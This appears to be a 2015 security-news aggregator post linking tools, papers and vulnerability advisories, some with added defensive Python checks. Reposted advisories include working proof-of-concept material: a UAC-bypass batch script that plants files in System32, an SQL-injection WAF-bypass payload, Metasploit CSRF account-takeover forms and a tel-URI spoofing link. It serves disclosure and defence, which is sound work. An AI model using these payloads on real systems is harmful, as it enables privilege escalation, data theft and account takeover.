Channel: BOT24

Paper: Pydgin: Generating Fast Instruction Set Simulators from Simple Architecture Descriptions with Meta-Tracing JIT Compilers

Abstract—Instruction set simulators (ISSs) remain an essential
tool for the rapid exploration and evaluation of instruction set extensions
in both academia and industry. Due to their importance
in both hardware and software design, modern ISSs must balance
a tension between developer productivity and high-performance
simulation. Productivity requirements have led to “ADL-driven”
toolflows that automatically generate ISSs from high-level architectural
description languages (ADLs). Meanwhile, performance
requirements have prompted ISSs to incorporate increasingly
complicated dynamic binary translation (DBT) techniques.
Construction of frameworks capable of providing both the productivity
benefits of ADL-generated simulators and the performance
benefits of DBT remains a significant challenge.
We introduce Pydgin, a new approach to ISS construction that
addresses the multiple challenges of designing, implementing, and
maintaining ADL-generated DBT-ISSs. Pydgin uses a Python-based,
embedded-ADL to succinctly describe instruction behavior
as directly executable “pseudocode”. These Pydgin ADL descriptions
are used to automatically generate high-performance DBT-ISSs
by creatively adapting an existing meta-tracing JIT compilation
framework designed for general-purpose dynamic programming
languages. We demonstrate the capabilities of Pydgin by implementing
ISSs for two instruction sets and show that Pydgin provides
concise, flexible ISA descriptions while also generating simulators
with performance comparable to hand-coded DBT-ISSs.

more here.........http://www.csl.cornell.edu/~cbatten/pdfs/lockhart-pydgin-ispass2015.pdf

netool.sh V4.4

Netool is a toolkit written in bash, Python and Ruby that lets you automate frameworks such as Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. The toolkit simplifies tasks such as sniffing TCP/UDP traffic, man-in-the-middle attacks, SSL sniffing, DNS spoofing, DoS attacks in WAN/LAN networks, and TCP/UDP packet manipulation using etter-filters. It can also capture pictures of the target's web browsing (driftnet) and uses macchanger to decoy scans by changing the MAC address.

more here.......http://sourceforge.net/projects/netoolsh/

TestTrack- open source defect tracker

TestTrack is a tool created by the Security Engineering team at Rackspace to track testing efforts. It attempts to streamline the testing process by offering features such as templating, report generation, metrics, and baseline self-service tools. Though it was designed with security folks in mind, there is nothing keeping QA/QE testers, or any other testers for that matter, from using it productively.

more here.........https://github.com/rackerlabs/django-TestTrack

Row hammer detection is possible

First off, detection isn't fixing, but it's a good step in that direction and I'm growing continually more confident in my claim that it probably is fixable as I work with this. Anyway, following the original idea sent me deep into writing drivers, and I quickly began to think that modifying my method slightly would bring detection and that writing this up would give me a lot of confirmation ahead of time for my original idea, which I continue to think is superior, though significantly more technically complicated to write a proof of concept for. And I seriously need a break from doing my day job first and then coming home and doing a lot of hours of row hammering.

more here.......http://dreamsofastone.blogspot.com/

Wig

wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.

The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.

wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.

more here.........https://github.com/jekyc/wig

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time to time due to the nature of the content on the site. But I discovered that it isn't just my blog: Quttera also blocks industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.

more here.......http://blog.dynamoo.com/2015/03/quttera-fails-and-spews-false-positives.html

Analyzing obfuscated VBA macros to extract C2 IP/URLs irregardless of runtime behavior

Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that have embedded VBA macros on our malware analysis service, which try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Didier Stevens, by the way!) to extract the VBA macro source code. Sometimes though, the Word file does not "trigger" (as it might include some VM detection code, requirement incompatibilities, etc.) so that in order to extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source.

more here..........http://payload-security.blogspot.de/2015/03/simplying-obfuscated-vba-macro-source.html

ECFS

ECFS is an extension to the existing ELF core file format in Linux. Its job is to intercept the Linux core-dump handler, catch the core-dump before it is written to disk, and carefully reconstruct it into an ecfs-core file. An ecfs-core file is backwards compatible with regular core files but has been extended in such a way that it boasts prolific amounts of data useful for process forensics analysis. An ecfs-file is not limited to just ELF program headers, but also contains many section headers as well as fully reconstructed relocation and symbol tables that reflect the state of code and data at runtime. ecfs-core files are also extremely straightforward to parse, more so when using the complementary libecfs C library (Python bindings are a work in progress).

more here............https://github.com/elfmaster/ecfs

Paper: Converting OpenBSD to PIE

ABSTRACT
Position-independent executables (PIEs) are the last step on the journey to a fully randomised address space on OpenBSD, with the goal of providing improved defense against return-oriented programming. This paper details the measures undertaken to successfully make this conversion on a broad, system-wide scale. It also provides a perspective on both the future of practically deployed ROP mitigations and the prevalence of such features (including PIE) on other operating systems, such as *BSD, Linux and Windows.

more here.............http://www.openbsd.org/papers/asiabsdcon2015-pie-paper.pdf

Reverse_HTTPS_Bot 0.8- Inclusive link to article titled "HTTPS Command and Control"

A python based https remote access trojan for penetration testing here.......https://github.com/ahhh/Reverse_HTTPS_Bot

OpenReil- Open source library that implements translator and tools for REIL (Reverse Engineering Intermediate Language)

REIL was initially developed by Zynamics as part of their BinNavi framework, proprietary code analysis software written in Java. However, after Zynamics was acquired by Google they abandoned BinNavi, so, I decided to develop my own implementation of REIL.

more here..........https://github.com/Cr4sh/openreil

Defense in depth -- the Microsoft way (part 31): UAC is for binary planting

Hi @ll,

the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.

In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.


Preconditions:

* a user running as "protected Administrator" on Windows 7
  and newer with standard UAC settings.

  JFTR: this is the default for "out-of-the-box" installations
        and typically almost never changed!

* some executables in directory %SystemRoot%\, but not in
  directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);

  JFTR: REGEDIT.EXE is one of these executables, and it has a
        manifest which specifies
        <requestedExecutionLevel level="highestAvailable">,
        so users running as "protected Administrator" are
        accustomed to the UAC prompt when they start REGEDIT.EXE
        and will most probably acknowledge the privilege elevation.

  Exploit (to be run as a batch script):

  for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
  exit /b
  :PLANT
  if exist "%SystemRoot%\System32\%~1" goto :EOF
  copy NUL: "%TEMP%\%~1"
  "%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
  "%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
  if /I "%~x1" == ".exe" "%~1" /?


  WUSA.EXE is one of the about 70 Microsoft programs which are
  UAC-autoelevated since Windows 7, so the user doesn't need to
  answer the UAC prompt when the batch script plants a file in
  the directory "%SystemRoot%\System32\"


Mitigations:

* set the UAC control to "ask always" (as it was in Windows Vista)

* remove the user accounts created during setup from the
  "Administrators" group and place them in the "Users" group, i.e.
  demote these accounts from "Administrator" to "Standard user".

  Start->Run "control.exe userpasswords2" alias
  "rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!

  JFTR: don't forget to enable the builtin "Administrator" account.

  Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>

| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
|   should be used sparingly. You probably created this type of
|   account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
|   accounts for other people on your PC, it's a good idea to give
|   them standard accounts.


stay tuned
Stefan Kanthak
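
A defender's check for the condition the post describes, as an added example that is not part of the original post: it lists `.exe`/`.dll` names in `%SystemRoot%` that also exist in `System32` or `SysWOW64` and classifies each copy, with zero-length files (what `copy NUL:` produces) called out. The function name `audit_shadowing` and the verdict labels are hypothetical; "identical" copies are usually legitimate, while "zero-length" and "differs" need a signature check.

```python
import hashlib
import os

WATCHED_EXTENSIONS = (".exe", ".dll")


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_shadowing(windows_dir, system_dirs):
    """Return (name, path, verdict) for every watched file name in windows_dir
    that also exists in one of system_dirs.

    verdict is "zero-length" (empty placeholder, as planted by the batch script),
    "identical" (same content as the copy in windows_dir) or "differs".
    """
    # Windows file names are case-insensitive, so index each system directory by lower case.
    listings = []
    for sysdir in system_dirs:
        if os.path.isdir(sysdir):
            listings.append((sysdir, {n.lower(): n for n in os.listdir(sysdir)}))

    findings = []
    for name in sorted(os.listdir(windows_dir)):
        original = os.path.join(windows_dir, name)
        if not name.lower().endswith(WATCHED_EXTENSIONS) or not os.path.isfile(original):
            continue
        for sysdir, by_lower in listings:
            match = by_lower.get(name.lower())
            if match is None:
                continue
            candidate = os.path.join(sysdir, match)
            if not os.path.isfile(candidate):
                continue
            if os.path.getsize(candidate) == 0:
                verdict = "zero-length"
            elif sha256_of(candidate) == sha256_of(original):
                verdict = "identical"
            else:
                verdict = "differs"
            findings.append((name, candidate, verdict))
    return findings


if __name__ == "__main__":
    root = os.environ.get("SystemRoot")
    if root:
        dirs = [os.path.join(root, d) for d in ("System32", "SysWOW64")]
        for name, path, verdict in audit_shadowing(root, dirs):
            print(f"{verdict:12} {path}")
```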

Interesting FBI bibliography on red-teaming doc

Some titles with PDF links include “Facing Your Flaws: The red team probes the network for a company to identify possible vulnerabilities and design flaws,” “Reflections from a Red Team Leader,” “Effectiveness of Using Red-Teams to Identify Maritime Security Vulnerabilities to Terrorist Attack,” and more here.......http://fbilibrary.fbiacademy.edu/bibliographies/redteaming.pdf

Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Release Date:
===========
12 Mar 2015

Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.

Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)

Vulnerability Disclosure Timeline:
=========================
2 Feb 2015    Bug reported to the vendor.
4 Feb 2015    Vendor returned with a case ID.
5 Feb 2015    Detailed info/config given.
12 Feb 2015    Asked about the case.
16 Feb 2015    Vendor returned "investigating ..."
6 Mar 2015    Asked about the case.
6 Mar 2015    Vendor has validated the issue.
12 Mar 2015    There isn't any fix addressing the issue.

Discovery Status:
=============
Published

Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)

Exploitation Technique:
==================
Remote, Unauthenticated


Severity Level:
===========
High

Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:

    An Apache web server with default configuration on Windows (XAMPP).
    A SOAP web service which is written in PHP and vulnerable to SQL injection.
    Netscaler WAF with SQL injection rules.

First request: ‘ union select current_user,2# - Netscaler blocks it.

Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.

Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.


Proof of Concept (PoC):
==================
Proof of Concept

Request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
          <string>’ union select current_user, 2#</string>

    </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <return xsi:type="xsd:string"> Name: root@localhost </return>
   </soap:Body>
</soap:Envelope>


Solution Fix & Patch:
================
12 Mar 2015    There isn't any fix addressing the issue.

Security Risk:
==========
The risk of the vulnerability above is estimated as high.

Credits & Authors:
==============
BGA Bilgi Güvenliği - Onur ALANBEL

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain:    www.bga.com.tr
Social:        twitter.com/bgasecurity
Contact:    bilgi@bga.com.tr

Copyright © 2015 | BGA
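
The three requests in the advisory differ only in their Content-Type headers, so a front-end check can flag the ambiguous one before any inspection engine or backend has to pick a value. The following is an added example, not part of the advisory or of any Citrix product: it parses a raw request, reports repeated singleton headers, and shows the two readings ("first wins" and "last wins") that a pair of parsers could take. The advisory does not state which reading either component uses; the host name, path and placeholder body are constructed.

```python
from collections import defaultdict

# Headers that must appear at most once; a repeat means two parsers may disagree.
SINGLETON_HEADERS = ("content-type", "content-length", "host")


def parse_headers(raw: bytes):
    """Return the header fields of a raw HTTP/1.x request as ordered (name, value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    fields = []
    for line in head.split(b"\r\n")[1:]:  # element 0 is the request line
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError("malformed header line: %r" % line)
        fields.append((name.decode("latin-1").strip().lower(),
                       value.decode("latin-1").strip()))
    return fields


def media_type(value: str) -> str:
    """Drop parameters such as charset and normalise case."""
    return value.split(";", 1)[0].strip().lower()


def audit_request(raw: bytes) -> dict:
    """Report repeated singleton headers and the Content-Type each reading would use."""
    seen = defaultdict(list)
    for name, value in parse_headers(raw):
        seen[name].append(value)

    repeated = {n: seen[n] for n in SINGLETON_HEADERS if len(seen[n]) > 1}
    ctypes = [media_type(v) for v in seen["content-type"]]
    first = ctypes[0] if ctypes else None
    last = ctypes[-1] if ctypes else None
    return {
        "repeated": repeated,
        "first_wins": first,      # what a parser keeping the first value sees
        "last_wins": last,        # what a parser keeping the last value sees
        "conflict": first != last,
        "action": "reject" if repeated else "forward",
    }


def build(*content_types):
    """Constructed sample request with a harmless placeholder SOAP body."""
    body = ("<soapenv:Envelope><soapenv:Body><string>placeholder</string>"
            "</soapenv:Body></soapenv:Envelope>")
    lines = ["POST /service.php HTTP/1.1", "Host: app.example.test"]
    lines += ["Content-Type: %s" % ct for ct in content_types]
    lines.append("Content-Length: %d" % len(body))
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode("ascii")


# Constructed samples mirroring the header layouts of the advisory's requests.
SAMPLES = {
    "single": build("text/xml; charset=utf-8"),
    "octet-only": build("application/octet-stream"),
    "polluted": build("application/octet-stream", "text/xml"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, audit_request(raw))
```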

Metasploit Project initial User Creation CSRF

# Exploit Title: Metasploit Project initial User Creation CSRF
# Google Dork: N/A
# Date: 14-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.metasploit.com/
# Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)
# Tested on: All OS
# CVE : N/A

Vulnerability:
Cross Site Request Forgery - (CSRF)

Info:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

More Details:
After doing some research, I have found that the anti-CSRF token
"authenticity_token" value is not validated from the local server side
which will result in a more CSRF attack scenario around the whole local
Metasploit project.

Affected URL(s)/PoC Code(s):
-Change Local Metasploit Project User Settings
<html>
<body>
<form action="https://127.0.0.1:3790/users/1" method="POST">
<input type="hidden" name="utf8" value="&#x2713;" />
<input type="hidden" name="&#95;method" value="put" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;fullname&#93;" value="Attacker" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Save&#32;Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

-Full Local Metasploit Project Account Takeover before setting up the first
user settings
<html>
<body>
<form action="https://127.0.0.1:3790/users" method="POST">
<input type="hidden" name="utf8" value="&#x2713;" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;username&#93;" value="Username" />
<input type="hidden" name="user&#91;password&#93;" value="PASSWORD" />
<input type="hidden" name="user&#91;password&#95;confirmation&#93;"
value="PASSWORD" />
<input type="hidden" name="user&#91;fullname&#93;" value="FUll_Name" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Create&#32;Account" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


More Details/Impact:
-Change Local Metasploit Project User Settings
-Full Local Metasploit Project Account Takeover before setting up the first
user settings

Report Timeline:
[-] 14/02/2015: Reported to Rapid7 Security Team
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
[-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public
disclosure rules
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the
vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901),
https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure

Thanks

--
Best Regards,

Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn <https://www.linkedin.com/in/symbiansymoh>
Curriculum Vitae <http://goo.gl/cNrVpL>
Facebook <https://fb.com/symbiansymoh>
Twitter <https://twitter.com/symbiansymoh>

Jolla Phone tel URI Spoofing

______________________________________________________________________
-------------------------- NSOADV-2015-001 ---------------------------

                     Jolla Phone tel URI Spoofing
______________________________________________________________________

  Title:                  Jolla Phone tel URI Spoofing
  Severity:               Low
  Advisory ID:            NSOADV-2015-001
  Date Reported:          2015-01-29
  Release Date:           2015-03-13
  Author:                 Nikolas Sotiriu
  Website:                http://sotiriu.de
  Twitter:                http://twitter.com/nsoresearch
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2015-001.txt
  Vendor:                 Jolla (https://www.jolla.com/)
  Affected Products:      Jolla Phone
  Affected Versions:      <= Sailfish OS 1.1.1.27 (Vaarainjärvi)
  Remote Exploitable:     Yes
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu



Description:
============

The Sailfish OS of the Jolla Phone contains a vulnerability that allows
to spoof the phone number, passed by a tel URI through an A HREF of a
website with some spaces (HTML &#32;).

This could be used to trick a victim to dial a premium-rate telephone
number, for example.



Proof of Concept:
=================

<a href="tel:0000000000[25xSpaces]Spoofed Text[38Spaces]aaaaa">Call</a>

Test Site http://sotiriu.de/demos/callspoof.html



Solution:
=========

Install Version 1.1.2.16 (Yliaavanlampi)

https://together.jolla.com/question/82037/release-notes-upgrade-112-yliaavanlampi-early-access/




Disclosure Timeline:
====================

2015-01-28: Asked for a PGP Key (security@jolla.com)
2015-01-29: Got the PGP Key
2015-01-29: Sent vulnerability information to vendor
2015-01-29: Feedback that the vendor is looking into the problem
2015-01-30: Got detailed information about the patch process and
            timeline
2015-02-19: Got an E-Mail that the patched version is released
2015-03-13: Release of this advisory
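
One way a dialer or link handler can avoid showing attacker-chosen text in a call prompt, as an added example that is not part of the advisory or of Sailfish OS: decode the `tel:` href fully, refuse anything containing whitespace or trailing text, and display only the canonical digits. The function name `parse_tel_href` is hypothetical, the accepted syntax is a deliberately strict subset of RFC 3966, and the sample numbers are constructed.

```python
import html
import re
from urllib.parse import unquote

# Subscriber part: optional "+", then digits and the visual separators - . ( )
NUMBER_RE = re.compile(r"\+?[0-9][0-9().\-]*")
# Parameters such as ;ext=22 (strict subset of what RFC 3966 allows)
PARAM_RE = re.compile(r"[a-z0-9\-]+(=[A-Za-z0-9.+\-]+)?")


def parse_tel_href(href: str):
    """Return the number to show in a dial prompt, or None if the href must not be dialled."""
    # Decode HTML entities (&#32;) and percent-escapes (%20) first, so neither
    # encoding can smuggle whitespace past the checks below.
    decoded = unquote(html.unescape(href))
    scheme, sep, rest = decoded.partition(":")
    if not sep or scheme.lower() != "tel":
        return None
    if any(ch.isspace() or not ch.isprintable() for ch in rest):
        return None
    number, *params = rest.split(";")
    if not NUMBER_RE.fullmatch(number):
        return None
    if not all(PARAM_RE.fullmatch(p) for p in params):
        return None
    # Strip visual separators so the prompt shows exactly what will be dialled.
    return re.sub(r"[().\-]", "", number)


# Constructed samples; the second follows the layout of the advisory's proof of concept.
SAMPLES = [
    "tel:+1-201-555-0123",
    "tel:0000000000" + " " * 25 + "Spoofed Text" + " " * 38 + "aaaaa",
    "tel:0000000000%20%20Spoofed%20Text",
    "tel:0000000000&#32;&#32;Spoofed Text",
    "tel:+358-9-123-4567;ext=22",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample[:40]), "->", parse_tel_href(sample))
```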

A local application could cause a denial-of-service to the audio_policy app in Android

#############################################################################
#
#   QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID:   CVE-2015-1525
# Product:   Android
# Vendor:   Google
# Subject:  A local application could cause a denial-of-service to the audio_policy app
# Effect:  cause a denial of service
# Author:  Guang Gong
# Date:     March 13th 2015
#
#############################################################################


Introduction
------------


Because the AudioPolicyManagerBase::getDeviceConnectionState function in
hardware/libhardware_legacy/audio/AudioPolicyManagerBase.cpp does not check
for a null pointer, Android versions below 5.0 allow attackers to cause a
denial of service to the audio_policy app, including mediaserver.

Affected Android version
----------
all versions below Lollipop 5.0

Patches
-------
Android Bug id 18262893
https://android.googlesource.com/platform/hardware/libhardware_legacy/+/2d2ea50df16fc1a04f1ebf8772c65c56e4f5ecfa


Description
-----------
The vulnerable code is as follows.

http://androidxref.com/4.4.4_r1/xref/hardware/libhardware_legacy/audio/AudioPolicyManagerBase.cpp#251

247 AudioSystem::device_connection_state AudioPolicyManagerBase::getDeviceConnectionState(audio_devices_t device,
248                                                   const char *device_address)
249 {
250     AudioSystem::device_connection_state state = AudioSystem::DEVICE_STATE_UNAVAILABLE;
251     String8 address = String8(device_address);  // <--- should have checked if device_address is NULL
252     if (audio_is_output_device(device)) {
253         if (device & mAvailableOutputDevices) {
254             if (audio_is_a2dp_device(device) &&
255                 (!mHasA2dp || (address != "" && mA2dpDeviceAddress != address))) {
256                 return state;
257             }

Attack vector
-------------
A local application could cause a denial-of-service to the audio_policy app,
including mediaserver.

The crash log is as follows:
85320 --------- beginning of crash
85321 F/libc    (18680): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 19486 (Binder_1)
85322 I/        (22751): fuzzing service:media.audio_policy 3:3
85323 I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
85324 I/DEBUG   (  180): Build fingerprint: 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
85325 I/DEBUG   (  180): Revision: '11'
85326 I/DEBUG   (  180): ABI: 'arm'
85327 I/DEBUG   (  180): pid: 18680, tid: 19486, name: Binder_1  >>> /system/bin/mediaserver <<<
85328 I/DEBUG   (  180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
85329 W/NativeCrashListener(19346): Couldn't find ProcessRecord for pid 18680
85330 I/DEBUG   (  180):     r0 00000000  r1 00000000  r2 00000000  r3 00000000
85331 E/DEBUG   (  180): AM write failure (32 / Broken pipe)
85332 I/DEBUG   (  180):     r4 b4afdb0c  r5 00000000  r6 b4afdb0c  r7 00000002
85333 I/DEBUG   (  180):     r8 b4afdc78  r9 55991c07  sl 000048f8  fp b4afddb0
85334 I/DEBUG   (  180):     ip b6e2cf4c  sp b4afdaf8  lr b6e25651  pc b6ee1dd0  cpsr 600e0030
85335 I/DEBUG   (  180):
85336 I/DEBUG   (  180): backtrace:
85337 I/DEBUG   (  180):     #00 pc 00010dd0  /system/lib/libc.so (strlen+83)
85338 I/DEBUG   (  180):     #01 pc 0000d64d  /system/lib/libutils.so (android::String8::String8(char const*)+8)
85339 I/DEBUG   (  180):     #02 pc 00009011  /system/lib/hw/audio_policy.default.so (android_audio_legacy::AudioPolicyManagerBase::getDeviceConnectionState(unsigned int, char const*)+12)
85340 I/DEBUG   (  180):     #03 pc 0000dfed  /system/lib/hw/audio_policy.default.so
85341 I/DEBUG   (  180):     #04 pc 00023145  /system/lib/libaudioflinger.so
85342 I/DEBUG   (  180):     #05 pc 00056301  /system/lib/libmedia.so (android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+1056)
85343 I/DEBUG   (  180):     #06 pc 000167a5  /system/lib/libbinder.so (android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+60)
85344 I/DEBUG   (  180):     #07 pc 0001aea3  /system/lib/libbinder.so (android::IPCThreadState::executeCommand(int)+562)
85345 I/DEBUG   (  180):     #08 pc 0001afbf  /system/lib/libbinder.so (android::IPCThreadState::getAndExecuteCommand()+38)
85346 I/DEBUG   (  180):     #09 pc 0001b001  /system/lib/libbinder.so (android::IPCThreadState::joinThreadPool(bool)+48)
85347 I/DEBUG   (  180):     #10 pc 0001ee93  /system/lib/libbinder.so
85348 I/DEBUG   (  180):     #11 pc 0000e97d  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
85349 I/DEBUG   (  180):     #12 pc 0000e505  /system/lib/libutils.so
85350 I/DEBUG   (  180):     #13 pc 00013133  /system/lib/libc.so (__pthread_start(void*)+30)
85351 I/DEBUG   (  180):     #14 pc 0001120b  /system/lib/libc.so (__start_thread+6)

Milestones
----------

Date                 Comment                            Sender
05/11/2014     Initial Report of CVE-2015-1525          Qihoo
07/11/2014     Sent the Android Bug ID 18262893         Google
27/01/2015     Sent the CVE-ID                          Google

VMCloak

VMCloak is a tool to fully create and prepare Virtual Machines that can be used by Cuckoo Sandbox. In order to create a new Virtual Machine one should prepare a few configuration values that will be used later on by the tool.

more here.......https://github.com/jbremer/vmcloak

Drone Forensics – An Overview

[This is the first in a series of posts about the forensic analysis of drones leading up to presentations at BSides NOLO and SANS DFIR Summit in Austin.] here.......https://integriography.wordpress.com/2015/03/15/drone-forensics-an-overview/

CodeGate General CTF 2015: good-crypto

Binary : http://binary.grayhash.com/bd24de5d345c0d1da274fcd7d9a2b244/file.xz We recently intercepted some kind of encrypted traffic, can you help us recover the password?

Update: Due to a crappy javascript programmer there’s one line of code missing, but I’m sure you can figure out which one

more here..........http://vnsecurity.net/ctf%20-%20clgt%20crew/2015/03/16/codegate-good-crypto.html